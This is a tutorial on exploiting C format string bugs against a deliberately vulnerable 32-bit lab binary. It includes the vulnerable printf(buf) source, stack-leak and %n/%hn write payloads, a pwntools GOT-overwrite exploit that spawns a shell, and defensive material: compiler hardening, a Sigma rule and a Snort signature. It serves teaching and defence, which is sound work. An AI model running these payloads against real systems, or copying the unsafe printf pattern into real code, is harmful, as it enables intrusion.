Format String Vulnerabilities: Read/Write Primitives via printf Internals
You control a string. The program hands it straight to printf with no format argument of its own. That one missing "%s" is enough to read any mapped address in the process and write any value you like to any writable address. No buffer overflow, no canary to defeat, no return address to smash. Just printf doing exactly what the C standard told it to do, on data it should never have trusted.
This walkthrough takes the bug from first principles to a shell on a 32-bit Linux lab binary, then shows the blue-team side: why almost nothing on the host fires until the shell spawns, and what you key your detections off instead.
Contents
- 1. The Format String Contract
- 2. Building the Vulnerable Lab Target
- 3. The Read Primitive: Leaking Stack Memory
- 4. Locating Your Buffer on the Stack
- 5. The Write Primitive: %n Mechanics
- 6. Targeting the GOT
- 7. The Full Exploit (pwntools)
- 8. Manual Split-Write Without Helpers
- 9. 64-bit Complications
- 10. Mitigations, Bypass Strategies, and Hardening
- 11. Common Attacker Techniques
- 12. Defensive Strategies & Detection
- 13. Tools for Format String Analysis
- 14. MITRE ATT&CK Mapping
- Summary
- Related Tutorials
- References
1. The Format String Contract
printf is variadic. Its prototype is int printf(const char *fmt, ...), and nothing in the call records how many arguments follow fmt. printf infers that at runtime, by parsing fmt and counting conversion specifiers. Each %-specifier tells glibc’s _IO_vfprintf (named __vfprintf_internal in recent glibc releases) to pull the next argument off the variadic list and format it.
On x86-32 (cdecl), those arguments live on the stack, immediately above the format string pointer. _IO_vfprintf walks them with the va_list / va_arg iterator. There is no bounds check. If the format string says “give me ten arguments” but the caller passed none, printf cheerfully reads ten stack slots that belong to other locals, saved registers, return addresses, and library pointers.
On x86-64 System V, the first six integer arguments are passed in registers (rdi holds fmt, then rsi, rdx, rcx, r8, r9), and only the seventh argument onward sits on the stack. That register detail changes the offsets you use but not the bug.
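The contract above can be modelled in a few lines. The sketch below is not glibc's parser; it is a rough regex approximation (the names SPEC and args_demanded are made up for illustration, and `*` widths are ignored) that counts how many variadic arguments a format string asks printf to fetch, whether or not the caller supplied them.

```python
import re

# Approximate shape of a conversion: %, optional "k$" position, flags, width,
# precision, length modifier, conversion letter. "%%" consumes no argument.
SPEC = re.compile(
    r"%(?:(\d+)\$)?[-+ #0]*(?:\d+)?(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?"
    r"([diouxXeEfgGaAcspn%])"
)

def args_demanded(fmt: str) -> int:
    """Return how many variadic arguments this format string makes printf fetch."""
    sequential = 0           # plain %x, %p, ... each take the next argument
    highest_positional = 0   # %7$p reaches as far as argument 7
    for match in SPEC.finditer(fmt):
        position, conversion = match.groups()
        if conversion == "%":
            continue
        if position:
            highest_positional = max(highest_positional, int(position))
        else:
            sequential += 1
    return max(sequential, highest_positional)

print(args_demanded("%s"))                               # the safe call: one argument
print(args_demanded("AAAA." + ".".join(["%p"] * 10)))    # attacker string: ten slots
```

The point of the model is that the number comes entirely from the string. If the string is attacker-controlled, so is the number of stack slots printf walks.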
| Item | Description |
|---|---|
| printf(fmt, ...) | Variadic; interprets fmt and fetches one argument per specifier from the stack (x86-32) or registers then stack (x86-64) |
| Vulnerable call | printf(user_input) gives the attacker both a read primitive (%x/%p/%s) and a write primitive (%n) |
| Safe equivalent | printf("%s", user_input) – the fix is one literal format string |
| Affected family | printf, fprintf, sprintf, snprintf, vprintf, vsprintf, syslog |
The whole printf family routes through _IO_vfprintf, so the bug is identical wherever a user-controlled buffer reaches the format-string slot. syslog(LOG_INFO, user_input) is the same vulnerability with a different front door.
| Specifier | Primitive | Mechanics |
|---|---|---|
| %x / %p | Stack read | Pops the next stack slot, prints it as hex |
| %s | Arbitrary read | Treats the next slot as char *, reads until \0 |
| %n | Arbitrary write (4 bytes) | Stores the count of bytes written so far into the int * argument |
| %hn | Write 2 bytes | Stores a short; used in split-write chains |
| %hhn | Write 1 byte | Stores one byte; best for null-byte-free GOT patching |
| %<k>$<spec> | Direct parameter access | %7$p reads argument 7 directly, no throwaway chain |
| %<N>x | Value control | Emitting N bytes before %n makes %n write N |

2. Building the Vulnerable Lab Target
Here is the whole target. It is intentionally broken, and the compile flags are deliberately weak so the mechanics are visible. Do not ship anything built this way.
// target.c - deliberately vulnerable lab binary
// Compile:
// gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void win(void) {
    system("/bin/sh"); // redirect here via GOT overwrite
}

void log_input(char *buf) {
    printf("[LOG] ");
    printf(buf); // VULNERABLE: user-controlled format string
    printf("\n");
}

int main(void) {
    char input[256];
    printf("Input: ");
    fgets(input, sizeof(input), stdin);
    input[strcspn(input, "\n")] = '\0';
    log_input(input);
    exit(0); // exit() calls fini/dtors -> alternative target
}
Build it and confirm the protections are down:
gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c
checksec --file=./target
# RELRO: No RELRO | Stack: No canary | NX: enabled | PIE: No PIE
-no-pie fixes the binary’s base so addresses are stable for teaching. -z norelro keeps the GOT writable. The stack canary is irrelevant to a format-string write because we never smash the stack, but disabling it removes noise. win() is our jump target: redirect a GOT entry there and the program calls system("/bin/sh") for us.
3. The Read Primitive: Leaking Stack Memory
Start by watching printf leak the stack. Feed it a chain of %p:
python3 -c "print('AAAA.' + '.'.join(['%p']*10))" | ./target
# [LOG] AAAA.0xf7f...c.0x8.0x80491b6.<...>.0x41414141.0x2e70252e.0x252e7025.0x70252e70   (abridged)
Every %p consumes one stack slot and prints it. Mixed in you will see libc pointers (high 0xf7... addresses on 32-bit), small loop counters, the return address back into main, and crucially 0x41414141, which is our AAAA showing up because the input buffer itself is sitting on the stack printf is walking.
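To convince yourself that the words after 0x41414141 really are your own input, it helps to turn the leaked values back into bytes. A minimal sketch, assuming 32-bit little-endian words and glibc's habit of printing a null pointer as (nil); the helper name words_to_bytes is made up for this example.

```python
import struct

def words_to_bytes(leak: str) -> bytes:
    """Turn dot-separated %p output into the raw little-endian stack bytes."""
    raw = b""
    for token in leak.split("."):
        if token == "(nil)":              # glibc prints NULL pointers this way
            raw += struct.pack("<I", 0)
        elif token.startswith("0x"):
            raw += struct.pack("<I", int(token, 16))
        # anything else (the "[LOG] AAAA" prefix, stray text) is not a stack word
    return raw

# The three words that follow the marker when the input is 'AAAA.%p.%p...'
print(words_to_bytes("0x41414141.0x2e70252e.0x252e7025"))
```

Reading the result as ASCII shows the start of the format string itself, which is the confirmation that printf has walked into the input buffer.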
Positional access cleans this up. Instead of counting %ps by hand, ask for one slot directly:
python3 -c "print('AAAA%7\$p')" | ./target
# [LOG] AAAA0x41414141
%7$p says “format argument number 7 as a pointer.” When it prints 0x41414141, you have found the slot that holds the first four bytes of your own buffer. That index, 7 here, is the single most important number in the exploit. It is the bridge that turns an uncontrolled read into a controlled one.
For arbitrary reads, %s dereferences the slot as a char *. Place an address in your buffer at the slot you control, then point %s at it:
python3 -c "
import struct, sys
got_exit = 0x0804c014 # from objdump -R, see Section 6
sys.stdout.buffer.write(struct.pack('<I', got_exit) + b'%7\$s')
" | ./target | xxd
Now %7$s reads the four bytes at offset 7 (your embedded address) as a pointer and dumps whatever string lives there. That is your arbitrary read: leak GOT entries, leak libc, leak anything mapped.
4. Locating Your Buffer on the Stack
The offset hunt is mechanical. Send a marker plus a positional read, and bump the index until the marker echoes back:
for i in $(seq 1 15); do
    echo -n "offset $i: "
    python3 -c "print('AAAA%$i\$p')" | ./target | grep -o '0x[0-9a-f]*'
done
When the output reads 0x41414141, that index is your offset to self. On this binary with this stack layout it is 7. Verify under the debugger if you want certainty:
pwndbg> r <<< $(python3 -c "print('AAAA.%7\$p')")
pwndbg> x/40wx $esp
One gotcha worth internalizing now: the offset is layout-dependent. Add or remove a local, change the compiler version, or rebuild without -m32, and your golden number shifts. I once burned an afternoon on a payload that “stopped working” after a recompile, only to discover an extra stack-aligned local had pushed my buffer from offset 6 to offset 7. Re-derive the offset every time the binary changes.
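Because the offset has to be re-derived after every rebuild, it is worth scripting. The sketch below works on a single line of %p chain output rather than driving the binary; find_offset is a hypothetical helper, and the sample line in the usage is invented to match the layout described here, not captured from a real run.

```python
from typing import Optional

def find_offset(leak_line: str, marker: bytes = b"AAAA") -> Optional[int]:
    """Return the 1-based %p index whose value equals the marker, else None."""
    wanted = hex(int.from_bytes(marker, "little"))   # b"AAAA" -> "0x41414141"
    # Keep only tokens that are printed pointer values, in order.
    values = [tok for tok in leak_line.split(".")
              if tok.startswith("0x") or tok == "(nil)"]
    for index, token in enumerate(values, start=1):
        if token == wanted:
            return index
    return None

# Invented sample output for input 'AAAA.%p.%p...'; real values will differ.
sample = "[LOG] AAAA.0xf7fb2000.0x8.0x80491b6.(nil).0x1.0xffffd0a4.0x41414141.0x2e70252e"
print(find_offset(sample))
```

Returning None instead of guessing makes a shifted layout obvious: widen the chain and try again.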
5. The Write Primitive: %n Mechanics
%n is the part of the C standard that should keep you up at night. It does not print anything. It takes the corresponding argument as an int * and stores the number of characters printf has emitted so far into that address.
So if you can place a target address in a stack slot you control, and you make printf emit exactly N bytes before the %n, you write the value N to that address. Width specifiers give you the byte count for free: %100x prints a value padded to 100 characters, advancing the counter to 100.
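The counter-then-store behaviour is easy to model. The following is a toy, not a printf implementation: it understands only %x and the %n family, treats "addresses" as indexes into a bytearray, and every name in it (DIRECTIVE, toy_printf) is invented for illustration.

```python
import re
import struct

DIRECTIVE = re.compile(r"%(?:(\d+)\$)?(\d+)?(hh|h)?([xn])")

def toy_printf(fmt: str, args: list, memory: bytearray) -> int:
    """Model printf's running output count; returns the final count."""
    written = 0      # characters emitted so far
    next_arg = 0     # next argument for non-positional directives
    pos = 0
    while pos < len(fmt):
        m = DIRECTIVE.match(fmt, pos)
        if not m:
            written += 1                  # ordinary character, emitted as-is
            pos += 1
            continue
        position, width, length, conv = m.groups()
        if position:
            value = args[int(position) - 1]
        else:
            value = args[next_arg]
            next_arg += 1
        if conv == "x":
            text = format(value & 0xFFFFFFFF, "x")
            written += max(len(text), int(width or 0))   # width pads, never truncates
        else:
            # %n / %hn / %hhn: store the count, truncated to the target size,
            # at the "address" held in the argument.
            size, code = {"hh": (1, "<B"), "h": (2, "<H"), None: (4, "<I")}[length]
            struct.pack_into(code, memory, value, written & ((1 << (8 * size)) - 1))
        pos = m.end()
    return written

memory = bytearray(4)
toy_printf("%1$100x%2$n", [0x41, 0], memory)
print(struct.unpack("<I", memory)[0])    # the value %n stored
```

Nothing is printed by %n itself; the only visible effect is the store, which is why the padding width is the attacker's real input.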
Writing a full 32-bit address with one %n would mean printing up to four billion padding characters. Nobody waits for that. Split the write:
- %hn writes the low 16 bits (a short).
- %hhn writes the low 8 bits (a single byte).
To plant a 4-byte value you do two %hn writes, one to addr and one to addr+2, padding each to the half-word you need. Because the lower half is sometimes numerically larger than the upper half, you order the writes so the running byte count only ever increases, and you account for the bytes already emitted by the embedded addresses themselves.
That bookkeeping is exactly the kind of off-by-a-few error that eats hours, which is why the next sections use both the pwntools helper (does the math for you) and a manual derivation (so you understand what the helper emitted).
6. Targeting the GOT
Lazy binding means each imported function is called through the Global Offset Table. The .plt stub is read-only, but .got.plt holds the resolved (or to-be-resolved) address and, without RELRO, it is writable. Overwrite the GOT entry of a function that gets called after your format string runs, and you redirect control.
exit() is perfect here: main calls exit(0) right after log_input returns, so we overwrite exit’s GOT slot with the address of win.
Find the addresses:
objdump -R ./target | grep -E 'exit|printf'
# 0804c014 R_386_JUMP_SLOT exit@GLIBC_2.0
readelf -s ./target | grep ' win'
# 42: 080491d6 ... FUNC GLOBAL DEFAULT win
In pwndbg you can read the live table and confirm the write afterward:
pwndbg> got
pwndbg> x/wx 0x0804c014 # exit GOT entry, before write
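0x804c014: 0x0804.... # unresolved -> holds an address inside exit's PLT stub (the push/jmp to the resolver), not the slot's own address; exact value varies per build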
Target slot: 0x0804c014. Value to write: 0x080491d6. That is the whole shape of the attack.
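If you would rather not copy addresses by eye, the relocation listing is simple to parse. A small sketch, assuming the three-column objdump -R layout shown above; got_slots is a made-up helper name, and pwntools' ELF class already does this more robustly.

```python
def got_slots(objdump_output: str) -> dict:
    """Map imported function names to their GOT slot addresses."""
    slots = {}
    for line in objdump_output.splitlines():
        fields = line.split()
        # Relocation rows look like: <offset> R_386_JUMP_SLOT <name>@<version>
        if len(fields) == 3 and fields[1].endswith("JUMP_SLOT"):
            name = fields[2].split("@")[0]
            slots[name] = int(fields[0], 16)
    return slots

listing = "0804c014 R_386_JUMP_SLOT exit@GLIBC_2.0"
print(hex(got_slots(listing)["exit"]))
```

Header rows and non-JUMP_SLOT relocations fall through the filter, so the full objdump -R output can be piped in unchanged.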

7. The Full Exploit (pwntools)
fmtstr_payload builds the split-write payload, computes the padding, and accounts for already-written bytes. Let pwntools resolve the symbols from the ELF so you never hardcode a stale address.
# exploit.py
from pwn import *
context.binary = elf = ELF('./target')
context.arch = 'i386'
p = process('./target')
win_addr = elf.symbols['win'] # 0x080491d6
got_exit = elf.got['exit'] # 0x0804c014
offset = 7 # found in Section 4
# Build the crafted format string: embedded address + width-padded %hn writes
payload = fmtstr_payload(offset, {got_exit: win_addr}, write_size='short')
log.info("Payload (%d bytes): %r", len(payload), payload)
p.sendlineafter(b'Input: ', payload)
p.interactive()
Run it:
$ python3 exploit.py
[*] '/home/lab/target'
Arch: i386-32-little
RELRO: No RELRO
[+] Starting local process './target'
[*] Switching to interactive mode
$ id
uid=1000(lab) gid=1000(lab) groups=1000(lab)
$ cat /etc/hostname
fmt-lab
When main reaches exit(0), the PLT stub jumps through the now-poisoned GOT entry into win, and system("/bin/sh") hands you a shell. Confirm the overwrite landed before exit runs by breaking on it in pwndbg and re-reading 0x0804c014; it should now read 0x080491d6.
8. Manual Split-Write Without Helpers
To see what pwntools emitted, write a value by hand. Take a generic example: write 0xdeadbeef to address A.
- Low half 0xbeef = 48879 to A
- High half 0xdead = 57005 to A+2
Order the writes ascending by value so the counter only grows: 0xdead (57005) is larger than 0xbeef (48879), so write 0xbeef first, then top up to 0xdead.
Layout, at offset 7 for the addresses:
[ A ][ A+2 ] <- 8 bytes of embedded addresses
%<48879-8>x %7$hn <- count reaches 0xbeef, write low half to A
%<57005-48879>x %8$hn <- count reaches 0xdead, write high half to A+2
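The -8 accounts for the eight bytes the two packed addresses already printed. After the first %hn, the counter sits at 48879, so the second pad only adds 57005 - 48879 = 8126 characters to climb to 57005. The spaces in the layout are for readability only: in the real payload the directives are contiguous, because any literal character between them also advances the count.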
For our real target the value is win = 0x080491d6: low half 0x91d6 (37334), high half 0x0804 (2052). Because the high half is the smaller number, you flip the write order: write 0x0804 to A+2 first, then pad up to 0x91d6 and write to A. That ordering decision is precisely the arithmetic fmtstr_payload handles for you, and exactly where hand-rolled payloads go wrong.
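The bookkeeping for both examples can be written down as a short function. This is a hand-rolled sketch for the 32-bit, addresses-first layout only, not what fmtstr_payload emits: hn_payload is a hypothetical name, and it assumes both half-words are comfortably larger than the eight address bytes so that each %<N>x pad is wide enough to be exact.

```python
import struct

def hn_payload(addr: int, value: int, offset: int) -> bytes:
    """Two-%hn payload: packed addresses first, then writes in ascending order."""
    low, high = value & 0xFFFF, value >> 16
    head = struct.pack("<II", addr, addr + 2)   # land at slots offset and offset+1
    # (half-word to write, positional index of its address), smallest value first
    writes = sorted([(low, offset), (high, offset + 1)])
    count = len(head)                           # 8 bytes already emitted
    body = ""
    for half, index in writes:
        pad = half - count
        if pad > 0:
            body += f"%{pad}x"                  # pad the count up to the half-word
        body += f"%{index}$hn"
        count = half
    return head + body.encode()

print(hn_payload(0x0804c014, 0xdeadbeef, 7)[8:])   # low half first
print(hn_payload(0x0804c014, 0x080491d6, 7)[8:])   # high half first
```

Sorting by value is the whole trick: the generic 0xdeadbeef case writes A then A+2, while the win address flips to A+2 then A without any special casing.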
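For GOT patching where you would rather not juggle half-word ordering, prefer four %hhn byte writes (write_size='byte'). The payload carries more directives, but each %hhn stores only the low byte of the count, so reaching a smaller value just means padding forward to the next multiple-of-256 wrap, at most 255 extra characters. Ordering stops being a correctness problem and becomes a minor length optimization.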
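The wrap-around arithmetic for byte writes is a one-liner per byte. A sketch under stated assumptions: hhn_pads is an invented helper, bytes are written low to high, and already_written must include whatever the payload printed before the first pad. Pads shorter than a printed value's natural width need %<N>c rather than %<N>x to stay exact.

```python
def hhn_pads(value: int, already_written: int = 0, width: int = 4) -> list:
    """Padding to emit before each %hhn when writing value one byte at a time."""
    pads = []
    count = already_written
    for i in range(width):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - count) % 256     # step forward until the low byte matches
        pads.append(pad)
        count += pad
    return pads

print(hhn_pads(0x080491d6))   # pads for bytes d6, 91, 04, 08 in that order
```

No pad ever exceeds 255, so the four writes can go in address order regardless of the byte values.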
9. 64-bit Complications
Move to x86-64 and three things change.
First, the calling convention. The first five format arguments are pulled from rsi, rdx, rcx, r8, r9, so your stack-resident buffer typically first appears around offset %6$ or later. Re-run the offset hunt; do not assume 7.
Second, null bytes. A 64-bit address like 0x0000555555554abc carries \0 in its top two bytes. fgets will happily store them, but printf stops parsing the format at the first null, so any directive placed after an inline address is never processed. You cannot lead with raw 64-bit addresses the way you did on 32-bit.
Third, the fix. Put the format directives first and the addresses last, where the nulls can no longer cut off anything printf still has to parse, and use byte-granular %hhn writes to keep the padding small. pwntools does both:
context.arch = 'amd64'
payload = fmtstr_payload(offset, {elf.got['exit']: win_addr},
                         write_size='byte')  # emits %hhn, null-safe ordering
fmtstr_payload knows the ABI and arranges the address table after the format specifiers, so the early null bytes never sit in front of a directive you still need to parse.
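The null-byte problem and the directives-first layout can be seen with struct alone. This is an illustration of the idea, not pwntools' algorithm: layout is a made-up helper, the %10$hhn directive is a placeholder, and a real payload must also pick the positional index that matches where the address table lands.

```python
import struct

addr = 0x0000555555554abc                 # example address from the text
packed = struct.pack("<Q", addr)          # bytes as they sit in the input buffer
first_null = packed.index(b"\x00")        # printf stops parsing here

def layout(directives: bytes, addresses: list) -> bytes:
    """Directives first, padded to an 8-byte boundary, then the raw addresses."""
    padded = directives + b"A" * (-len(directives) % 8)   # keep slots aligned
    return padded + b"".join(struct.pack("<Q", a) for a in addresses)

payload = layout(b"%10$hhn", [addr])
print(first_null, payload.index(b"\x00"))
```

With the address inline at the front, parsing would end after six bytes; in the reordered payload the first null sits past every directive, so printf has already seen everything it needs.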
10. Mitigations, Bypass Strategies, and Hardening
| Mitigation | Effect on Exploit |
|---|---|
| Full RELRO | GOT is fully resolved at load time and then remapped read-only; GOT overwrite dies |
| ASLR | Randomises libc/stack/heap; need an info-leak first |
| PIE | Randomises binary base; leak base before writing |
| Stack canary | Irrelevant to %n writes: a targeted write to saved $eip never touches the canary |
| -Wformat-security | Flags printf(user) at compile time |
| _FORTIFY_SOURCE=2 | Aborts on %n in a writable-memory format string in many configs; not a full block |
The read primitive is the universal solvent here. ASLR and PIE only force an ordering: leak before you write. Use %p or %s to pull a libc pointer or the binary base out of the GOT, subtract the known static offset, and compute the live address you actually want. Then build the write with that resolved value.
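The leak-then-write ordering boils down to one subtraction and one addition. A worked sketch with invented numbers: the leaked pointer and both symbol offsets below are hypothetical, and in practice the offsets come from the exact libc build on the target.

```python
def rebase(leaked_addr: int, leaked_symbol_offset: int, wanted_symbol_offset: int) -> int:
    """Turn one leaked runtime pointer into the runtime address of another symbol."""
    base = leaked_addr - leaked_symbol_offset
    if base & 0xFFF:
        # Mapping bases are page-aligned; anything else means a wrong leak or offset.
        raise ValueError(f"implausible base {base:#x}")
    return base + wanted_symbol_offset

# Hypothetical values for illustration only.
leaked_puts = 0xf7e3a460      # read out of a GOT entry with %s
puts_offset = 0x0006a460      # static offset of puts in this libc build
system_offset = 0x00044cc0    # static offset of system in the same build
print(hex(rebase(leaked_puts, puts_offset, system_offset)))
```

The alignment check is cheap insurance: a base that is not page-aligned almost always means the leak was truncated by a null byte or the libc version is wrong.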
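When Full RELRO closes the GOT, change targets, not techniques. Historically __malloc_hook and __free_hook were favorite writable function pointers, but both were removed in glibc 2.34, so they are no longer usable on modern systems. .fini_array, the destructor pointer array that exit() walks on the way out, is a fine alternative on a binary like this lab target, but be careful with it as a RELRO bypass: in the default GNU ld layout .fini_array sits inside the RELRO segment, so it is writable only when the binary was linked without RELRO. Check with readelf -l before planning around it. What does survive Full RELRO is any code pointer in ordinary writable memory: saved return addresses on the stack remain an option when the layout is predictable and ASLR is leaked, as do function pointers the application keeps in .data, .bss, or on the heap.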
For defenders, the class is eliminable, not merely mitigable:
- Compile with -Wformat=2 -Wformat-security -Werror=format-security and fail the build on any hit.
- Enable _FORTIFY_SOURCE=2 in release builds (it only takes effect with optimization enabled, -O1 or higher).
- Link Full RELRO: -Wl,-z,relro,-z,now.
- Deploy PIE and ASLR together.
- SAST it: semgrep for printf(var), CodeQL cpp/tainted-format-string, flawfinder. A blunt grep finds most of it: grep -rn "printf(" --include="*.c" | grep -v '"%'.
- Sandbox with seccomp so a service process cannot execve a shell even if its GOT is poisoned.
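The blunt grep in the list above flags every printf call with a literal that has no % in it. A slightly sharper, still naive, check looks at the format argument's position instead. This is a regex sketch, not a parser: suspicious_calls and the tables around it are invented for illustration, and it will miss multi-line calls and strings containing semicolons.

```python
import re

# Index of the format argument for each function (printf's format is argument 0).
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}
CALL = re.compile(r"\b(printf|fprintf|sprintf|snprintf|syslog)\s*\(([^;]*)\)\s*;")

def suspicious_calls(source: str) -> list:
    """Return (line number, line) for calls whose format is not a string literal."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in CALL.finditer(line):
            args = [a.strip() for a in m.group(2).split(",")]
            index = FORMAT_ARG_INDEX[m.group(1)]
            if index < len(args) and not args[index].startswith('"'):
                hits.append((lineno, line.strip()))
    return hits

sample = 'printf("[LOG] ");\nprintf(buf);\nfprintf(stderr, msg);\nsnprintf(out, 8, "%s", s);\n'
for lineno, text in suspicious_calls(sample):
    print(lineno, text)
```

Treat the output as a review queue, not a verdict. A compiler with -Werror=format-security remains the authoritative check.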

11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Stack read chain | %p%p%p or %<k>$p to leak addresses, canaries, and libc base |
| Arbitrary read | Embedded address plus %s to dump any mapped string |
| GOT overwrite | %hn/%hhn write redirects a soon-to-be-called import |
| .fini_array overwrite | Redirects a destructor pointer that fires at exit(); needs a binary linked without RELRO |
| Saved return overwrite | %n to a saved $eip/$rip when the stack is predictable |
| IDS evasion | Encoding or fragmenting %n/%x to dodge signature matching |
12. Defensive Strategies & Detection
Be honest about the telemetry: nothing on the host directly observes a malformed printf string. Detection is behavioral and lands on what happens after the GOT overwrite, plus crash artifacts from failed attempts.
| Signal | Source | Detail |
|---|---|---|
| Sysmon Event ID 1 (Process Create) | Sysmon | A daemon spawning /bin/sh or cmd.exe; pivot on ParentImage, ParentCommandLine |
| Sysmon Event ID 3 (Network Connection) | Sysmon | Post-exploit C2 from an exploited service |
| Sysmon Event ID 8 (CreateRemoteThread) | Sysmon | Post-shell injection of a thread into another process |
| Sysmon Event ID 11 (File Create) | Sysmon | Dropper staged to disk post-shell |
| Auditd execve | auditd | -a always,exit -F arch=b32 -S execve catches execve("/bin/sh") from the 32-bit lab binary; add a matching arch=b64 rule for 64-bit processes |
| ETW Microsoft-Windows-Kernel-Process | ETW | Anomalous parent to child lineage on Windows targets |
| Application crash logs | OS/app | A failed %s deref segfaults; correlate SIGSEGV with prior input carrying %x/%n/%s |
The high-value detection is parent-child lineage: a network service that has no business forking a shell suddenly becoming /bin/sh’s parent.
title: Shell Spawned from Non-Interactive Service Process
status: experimental
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith:
            - '/sh'
            - '/bash'
            - '/dash'
        ParentImage|contains:
            - 'httpd'
            - 'nginx'
            - 'sshd'
            - 'target'
    condition: selection
fields:
    - Image
    - ParentImage
    - ParentCommandLine
    - CommandLine
falsepositives:
    - Legitimate admin shell invocations
    - Interactive logins through sshd, which spawns shells by design; scope or drop that parent in production
level: high
tags:
    - attack.execution
    - attack.t1203
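Before deploying a rule like this, it can help to replay its logic over a few recorded events. The sketch below mirrors the selection in plain Python; the field names follow the rule, but the event dicts, the watch list, and the helper name is_suspicious are all hypothetical, and sshd is left out of the parent list because it spawns shells legitimately.

```python
import os

SHELLS = {"sh", "bash", "dash"}
SERVICE_PARENTS = ("httpd", "nginx", "target")   # hypothetical watch list

def is_suspicious(event: dict) -> bool:
    """True when a watched service process is the parent of a shell."""
    child = os.path.basename(event.get("Image", ""))
    parent = event.get("ParentImage", "")
    return child in SHELLS and any(name in parent for name in SERVICE_PARENTS)

events = [
    {"Image": "/bin/sh", "ParentImage": "/usr/sbin/nginx"},
    {"Image": "/bin/bash", "ParentImage": "/usr/bin/tmux"},
    {"Image": "/usr/bin/ssh", "ParentImage": "/usr/sbin/nginx"},
]
print([is_suspicious(e) for e in events])
```

Comparing the child by basename rather than suffix keeps binaries such as ssh from matching, which is the same effect the leading slash has in the rule's endswith patterns.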
For network-exposed services, catch the probe at the input layer. Sequences of %x, %p, %n, %s, %hn, %hhn, or %<digit>$ direct-parameter syntax are strong indicators of format-string fuzzing:
alert tcp any any -> $HOME_NET any (
    msg:"FORMAT STRING PROBE - %n in payload";
    content:"%n"; nocase;
    sid:9000001; rev:1;
)
Treat input-layer signatures as tripwires, not gates. They are trivially encoded around, which is why hardening (RELRO, FORTIFY, seccomp) is the real control.
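The same tripwire idea works inside an application or log pipeline. A minimal sketch, assuming raw request bytes are available: PROBE and probe_score are invented names, the pattern covers only the conversions named above, and URL-encoded text such as %20x will produce false positives.

```python
import re

# %, optional "k$" position, optional width, optional length, then x/X/p/s/n.
PROBE = re.compile(rb"%(?:\d+\$)?\d*(?:hh|h|ll|l)?[xXpsn]")

def probe_score(payload: bytes) -> int:
    """Count format-string style directives in a raw input."""
    return len(PROBE.findall(payload))

for sample in (b"AAAA%7$p", b"%p.%p.%p", b"%2044x%8$hn", b"GET /index.html"):
    print(sample, probe_score(sample))
```

A count is more useful than a boolean here: one stray %s in user text is noise, while a run of positional directives in a single field is worth an alert.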

13. Tools for Format String Analysis
| Tool | Description | Link |
|---|---|---|
| pwntools | Exploit automation; fmtstr_payload builds the writes | docs.pwntools.com |
| checksec | Enumerates RELRO/PIE/canary/NX | github.com |
| objdump / readelf | GOT relocations and symbol addresses | gnu.org |
| GDB + pwndbg | got, stack inspection, write verification | github.com |
| ltrace | Watch the live printf arguments | ltrace.org |
| Ghidra | Static review of printf call sites | ghidra-sre.org |
| semgrep / flawfinder | SAST for printf(var) patterns | semgrep.dev |
14. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Crash logs, anomalous child processes from a vulnerable parent |
| Hijack Execution Flow | T1574 | GOT / .fini_array overwrite redirecting control |
| Process Injection | T1055 | Sysmon Event ID 8 after the shell lands |
| System Information Discovery | T1082 | %p read primitive enumerating stack/libc addresses |
| Deobfuscate/Decode Files or Information | T1140 | Encoded format payloads dodging IDS signatures |
ATT&CK has no dedicated technique for format-string bugs specifically. The correct parents are T1203 for the execution and T1574 for the control-flow hijack; do not invent a sub-technique ID.
Summary
- A user-controlled printf format string is a full read/write primitive, not a crash bug. The missing "%s" lets the attacker drive _IO_vfprintf’s argument walk directly.
- %p/%s leak arbitrary memory; %n/%hn/%hhn write arbitrary values, with width specifiers controlling exactly what gets written.
- The offset to your own buffer is the master key: find it with %N$p, then point reads and writes wherever you choose.
- GOT overwrite to win gives a shell on the lab binary. Under Full RELRO the GOT is read-only (and, in the default GNU ld layout, so is .fini_array), so pivot to a saved return address or another writable code pointer; the old __malloc_hook/__free_hook targets are gone as of glibc 2.34.
- Detection is behavioral and post-exploitation: watch service processes spawning shells (Sysmon Event ID 1, auditd execve), and kill the class at the source with -Werror=format-security, Full RELRO, FORTIFY, and seccomp.
Related Tutorials
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- glibc _IO_vfprintf internals, va_list/va_arg mechanics → verify against glibc source
- fmtstr_payload API → verify against pwntools documentation
- codearcana.com
- www.gyanbyte.com
- medium.com
- owasp.org
- ctf101.org
- www.kayssel.com